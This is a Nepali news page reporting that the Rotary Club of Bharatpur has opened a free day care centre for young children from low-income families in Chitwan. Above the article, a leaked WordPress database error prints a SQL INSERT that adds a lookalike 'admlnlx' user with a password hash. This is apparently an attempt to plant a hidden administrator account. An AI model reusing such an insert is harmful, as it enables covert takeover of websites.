WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BeCPiB02CQ1/CXmpVPcsOzpg0oOhnM0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-10 11:36:06', '', 'admlnlx', 'admlnlx')
चितवन, माघ १९–
रोटरी क्लव अफ भरतपुरले आजबाट चाईल्ड डे केयर सेन्टर संचालनमा ल्याएको छ ।
भरतपुर–४ बेलचोकस्थित भगवती टोलमा निम्न आय भएका परिवारलाई लक्षित गरि चाईल्ड डे केयर संचालनमा ल्याएको हो ।
आज एक कार्यक्रमकाबीच रोटरी इन्टरनेशनल डिष्ट्रिक्ट ३२९२ का एजी निरञ्जन प्रधानले चाईल्ड केयरको उद्घाटन गर्नुभयो । कार्यक्रमका संयोजक आईपी ढकालले चाईल्ड डे केयरको बारेमा प्रकाश पार्नुभएको थियो । कार्यक्रममा विभिन्न रोटरी र रोटर्याक्ट क्लवका प्रतिनिधिहरुको सहभागिता रहेको थियो । सो चाइल्ड डे केयरमा २५ जना बालबालिकाहरु राख्न सकिने छ । आज पहिलो दिन १५ जना बालबालिकाहरुले सेवा लिएका छन् । सो चाईल्ड डे केयरमा २ देखि पाँच वर्षसम्मका बालबालिकाहरुले निःशुल्क सेवा लिन पाउने छन् । कार्यक्रम रोटरी क्लव अफ भरतपुरका अध्यक्ष बसन्त रानाभाटको अध्यतामा सम्पन्न भएको थियो ।